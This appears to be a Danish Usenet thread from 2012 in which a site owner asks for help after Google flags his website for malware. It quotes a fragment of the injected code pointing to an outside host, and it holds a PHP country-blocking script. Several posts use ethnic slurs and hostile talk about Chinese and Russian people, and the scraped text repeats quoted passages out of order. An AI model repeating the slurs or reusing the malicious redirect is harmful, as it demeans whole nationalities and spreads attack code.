Anders Wegge Keller
Mar 9, 2012, 12:49:55 PM3/9/12
to
Karl Erik Christensen <karl...@none.invalid> writes:
> Siderne ligger hos UnoEuro - som svarer at jeg skal rense mine filer :-)
OK - jeg synes ellers jeg havde læst noget om one.com tidligere i
> Siderne ligger hos UnoEuro - som svarer at jeg skal rense mine filer :-)
tråden. Men det samme forhold gør sig sandsynligvis gældende hos de
fleste delte hosts.
> Jeg har mistanke til en mailformular, som jeg dog udskiftede for et
> par måneder siden, til en med chaptcha. Med den gamle fik jeg en del
> spam fra russere.
har været adgang til at eksekvere vilkårlig php-kode, tror jeg ikke
det er der du finder synderen.
Rune Jensen
Mar 9, 2012, 1:59:42 PM3/9/12
to
Asger Joergensen skrev:
> Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
> ens side
kan se samtlige dataudvekslinger imellem IPerne som besøger din side,
så gør det. Det kan helt klart anbefales. Du skal logge hele dynen,
tid, IP, POST-udvekslinger og header-data.
En (sjovt nok) Google-mand sagde engang, at det at kigge LOGgen
igennem jævnligt for at finde underlige "peaks"er en helt normal
procedure i forbindelse med at sikre sig imod netop sådan noget her.
Men uanset Google, så giver det også god mening.
Kører du Linux, findes der rigtigt gode audition-værktøjer, som kan
finde sårbarheder i dit websted. Jeg har ikke min Linux-bænk ved
hånden men det hedder noget med 3f (lidt underligt navn). Det kan tage
_lang_ tid at lave fuldt check, og backup er nødvendigt. Til gengæld
er det ret grundigt med at finde sårbarheder, som du måske ikke selv
er klar over.
> og hvordan man kan sikre sig mod det ?
XML-encode på vejen ud til siden, når indhold er brugergenereret -
f.eks. blog-kommentarer.
Det tager SQL-injection og visse XSS. Langt de fleste angreb sker den
vej.
Så skal du have sat serveren til IKKE at acceptere remote code
execution. Det er en PHP "ting", ASP har ikke problemet, og jeg tror
ikke umiddelbart Python har det heller (har ikke hørt om det).
https://www.owasp.org/index.php/PHP_Top_5
Men du skal have fundet synderen, så du er nødt til at grave. Søg på
noget af koden i Google eller simpelthen på domænet for malwaren, det
er altid godt udgangspunkt, jeg har fundet flere guld-informationer
den vej før ved sådanne angreb.
MVH
Rune Jensen
Ole Gaarde Kristensen
Mar 12, 2012, 7:44:17 PM3/12/12
to
"Karl Erik Christensen" <karl...@none.invalid> skrev i en meddelelse
news:4f5a1fae$0$290$1472...@news.sunsite.dk...
[KLIP]
> http://www.bpoffer.changeip.org/"); exit(); } } } }
>
Hej Karl Erik
changeip.org ser ud til at være en tjeneste a'la GratisDNS.
Måske du skulle give dem et tip om at nogen misbruger deres tjeneste.
--
Med venlig hilsen
Ole Gaarde Kristensen
Karl Erik Christensen
Mar 13, 2012, 12:04:35 PM3/13/12
to
On 13-03-2012 00:44, Ole Gaarde Kristensen wrote:
>
> Hej Karl Erik
>
> changeip.org ser ud til at være en tjeneste a'la GratisDNS.
> Måske du skulle give dem et tip om at nogen misbruger deres tjeneste.
>
Ja, det er dog utroligt at nogen har måske 50 botter i færd med at søge
>
> Hej Karl Erik
>
> changeip.org ser ud til at være en tjeneste a'la GratisDNS.
> Måske du skulle give dem et tip om at nogen misbruger deres tjeneste.
>
efter huller på hjemmesider.
Især kinesere har en mængde ip-adresser i områder som f.eks. 124.115.0.xxx
De kan fanme få nogen tæsk, kan de :-)
Hvorfor kan man dog ikke blive enige om at boykotte de sataner?
Hvis kinesiske firmaer vil kommunikere med os "civiliserede", må de
sgu-da gøre noget ved problemet.
Ris-gnaskere :-)
Karl Erik Christensen
Mar 13, 2012, 12:18:09 PM3/13/12
to
On 13-03-2012 17:04, Karl Erik Christensen wrote:
> Ja, det er dog utroligt at nogen har måske 50 botter i færd med at søge
> efter huller på hjemmesider.
> Især kinesere har en mængde ip-adresser i områder som f.eks. 124.115.0.xxx
Det der er så helvedes irriterende er, at jeg for indtil ca. 1 år siden
> Ja, det er dog utroligt at nogen har måske 50 botter i færd med at søge
> efter huller på hjemmesider.
> Især kinesere har en mængde ip-adresser i områder som f.eks. 124.115.0.xxx
testede på ip-adressen, og sendte ballademagere "til helvede" :-)
<?php
$IPaddress=$_SERVER['REMOTE_ADDR'];
$two_letter_country_code=iptocountry($IPaddress);
if ($two_letter_country_code=="PK" || $two_letter_country_code=="KR" ||
$two_letter_country_code=="BG" || $two_letter_country_code=="SD" ||
$two_letter_country_code=="ID" || $two_letter_country_code=="CN" ||
$two_letter_country_code=="RU" || $two_letter_country_code=="HG" ||
$two_letter_country_code=="Unknown"){
Header("Location: http://www.hell.com/");
die();
}else{
Header("Location: index1.php");
die();
}
function iptocountry($ip) {
$numbers = preg_split( "/\./", $ip);
include("ip_files/".$numbers[0].".php");
$code = ($numbers[0] * 16777216) + ($numbers[1] * 65536) +
($numbers[2] * 256) + ($numbers[3]);
foreach($ranges as $key => $value){
if($key <= $code){
if($ranges[$key][0] >=
$code){$two_letter_country_code=$ranges[$key][1];break;}
}
}
if ($two_letter_country_code ==
""){$two_letter_country_code="Unknown";}
return $two_letter_country_code;
}
?>
Men denne fjernede jeg fra mine sider, da en bekendt som var i østen,
klagede over at han ikke kunne komme på min hjemmeside :-)
Allan Vebel
Mar 13, 2012, 1:58:51 PM3/13/12
to
Karl Erik Christensen skrev:
> Men denne fjernede jeg fra mine sider
Jeg bliver ved med at få "Websiden blev ikke fu..."
i IE - i din sidebar. Her der der vel også noget der
skal fjernes?
Desuden mangler et banner.
--
Allan Vebel
http://vebel.dk
> Men denne fjernede jeg fra mine sider
i IE - i din sidebar. Her der der vel også noget der
skal fjernes?
Desuden mangler et banner.
--
Allan Vebel
http://vebel.dk
Krabsen
Mar 13, 2012, 2:28:11 PM3/13/12
to
Den 09-03-2012 16:00, Karl Erik Christensen skrev:
> Google advarer mod "Malware" på mit site ranunkelvej.com
Det har måske ikke noget med det at gøre, men har du ikke også problemer
> Google advarer mod "Malware" på mit site ranunkelvej.com
med http://www.produceret-i.dk/index.php ?
Den ser ret amputeret ud..
..men den går måske til en undermappe (et kælderværelse?) på
ranunkelvej.com ??
Philip Nunnegaard
Mar 13, 2012, 2:50:25 PM3/13/12
to
Karl Erik Christensen skrev:
> Hvorfor kan man dog ikke blive enige om at boykotte de sataner?
>
> Hvis kinesiske firmaer vil kommunikere med os "civiliserede", må de
> sgu-da gøre noget ved problemet.
> Ris-gnaskere :-)
Jeg har tænkt noget lignende; Nogle gange ville jeg ønske at man
klippede linjen og blokere internettet for alle lande øst for det gamle
jerntæppe, indtil deres regimer får styr på tingene. Men det varer jo
nok 50-100 år endnu.
> Hvorfor kan man dog ikke blive enige om at boykotte de sataner?
>
> Hvis kinesiske firmaer vil kommunikere med os "civiliserede", må de
> sgu-da gøre noget ved problemet.
> Ris-gnaskere :-)
klippede linjen og blokere internettet for alle lande øst for det gamle
jerntæppe, indtil deres regimer får styr på tingene. Men det varer jo
nok 50-100 år endnu.
Karl Erik Christensen
Mar 13, 2012, 3:07:03 PM3/13/12
to
projekter.
Ja, den har lejet et kælderværelse, med fælles køkken og bad.
Åh ja - kælderværelse minder mig altid om gode gamle "Bamse", som
desværre døde sidste år.
Hans "Cafe det lyse sind" er da noget af det bedste han lavede.
http://www.youtube.com/watch?v=jeqEyTW1sI0
Leif Neland
Mar 14, 2012, 9:26:46 AM3/14/12
to
"Karl Erik Christensen" <karl...@none.invalid> skrev i en meddelelse
> On 13-03-2012 00:44, Ole Gaarde Kristensen wrote:
>>
>> Hej Karl Erik
>>
>> changeip.org ser ud til at være en tjeneste a'la GratisDNS.
>> Måske du skulle give dem et tip om at nogen misbruger deres tjeneste.
>>
>
> Ja, det er dog utroligt at nogen har måske 50 botter i færd med at søge
> efter huller på hjemmesider.
> Især kinesere har en mængde ip-adresser i områder som f.eks. 124.115.0.xxx
>
> De kan fanme få nogen tæsk, kan de :-)
>
Jeg har lavet et redirect til en hjemmeside om den kinesiske
>>
>> Hej Karl Erik
>>
>> changeip.org ser ud til at være en tjeneste a'la GratisDNS.
>> Måske du skulle give dem et tip om at nogen misbruger deres tjeneste.
>>
>
> Ja, det er dog utroligt at nogen har måske 50 botter i færd med at søge
> efter huller på hjemmesider.
> Især kinesere har en mængde ip-adresser i områder som f.eks. 124.115.0.xxx
>
> De kan fanme få nogen tæsk, kan de :-)
>
nobelprismodtager, de myndighederne forsøger at skjule eksistensen af.
(Jeg hoster den selv, så det generer ikke andres båndbredde)
Så kan det kinesiske tankepoliti tage sig af de forstyrrende :-)
Leif
Karl Erik Christensen
Mar 14, 2012, 12:08:11 PM3/14/12
to
On 14-03-2012 14:26, Leif Neland wrote:
> Jeg har lavet et redirect til en hjemmeside om den kinesiske
> nobelprismodtager, de myndighederne forsøger at skjule eksistensen af.
> (Jeg hoster den selv, så det generer ikke andres båndbredde)
> Så kan det kinesiske tankepoliti tage sig af de forstyrrende:-)
>
> Leif
Hvis bare man kunne få nogen til at hoste en "redirect-side" - der evt.
> Jeg har lavet et redirect til en hjemmeside om den kinesiske
> nobelprismodtager, de myndighederne forsøger at skjule eksistensen af.
> (Jeg hoster den selv, så det generer ikke andres båndbredde)
> Så kan det kinesiske tankepoliti tage sig af de forstyrrende:-)
>
> Leif
kunne "lave det grimme" ved de skide russiske og kinesiske botter.
Jeg ville være den første til at sende dem i døden.
Min kode har fungeret udmærket, den sløver ikke hjemmesiden væsentligt.
Nu går der vel en måneds tid, inden jeg har alt oppe at køre igen.
Og hvad med Google? - tager det nu flere måneder inden de er overbeviste
om min uskyld? - Ja lidt skyld har jeg jo, men ikke bevidst. Det er jo
hvad der _kan_ ske.
Karl Erik Christensen
Mar 14, 2012, 12:20:18 PM3/14/12
to
On 13-03-2012 18:58, Allan Vebel wrote:
> Karl Erik Christensen skrev:
>
>> Men denne fjernede jeg fra mine sider
>
> Jeg bliver ved med at få "Websiden blev ikke fu..."
> i IE - i din sidebar. Her der der vel også noget der
> skal fjernes?
>
> Desuden mangler et banner.
>
Hej Allan.
> Karl Erik Christensen skrev:
>
>> Men denne fjernede jeg fra mine sider
>
> Jeg bliver ved med at få "Websiden blev ikke fu..."
> i IE - i din sidebar. Her der der vel også noget der
> skal fjernes?
>
> Desuden mangler et banner.
>
Jeg går og overvejer at skifte fysisk adresse, så derfor er jeg i tvivl
om jeg skal beholde ranunkelvej.com. Den udløber til maj.
Mon domænet "sy'fyn.dk" er ledigt? Så flytter jeg sgu nok dertil :-)
Desværre har jeg ikke tid til at reparere skaderne lige nu.
Men min mail virker da :-)
Allan Vebel
Mar 14, 2012, 6:16:38 PM3/14/12
to
Karl Erik Christensen skrev:
Forståeligt nok.
Jeg husker en virksomhed der kaldte sig for
Dogplace, fordi de startede i Hundested - og så
flyttede de til Hillerød.
Forståeligt nok.
Jeg husker en virksomhed der kaldte sig for
Dogplace, fordi de startede i Hundested - og så
flyttede de til Hillerød.
0 new messages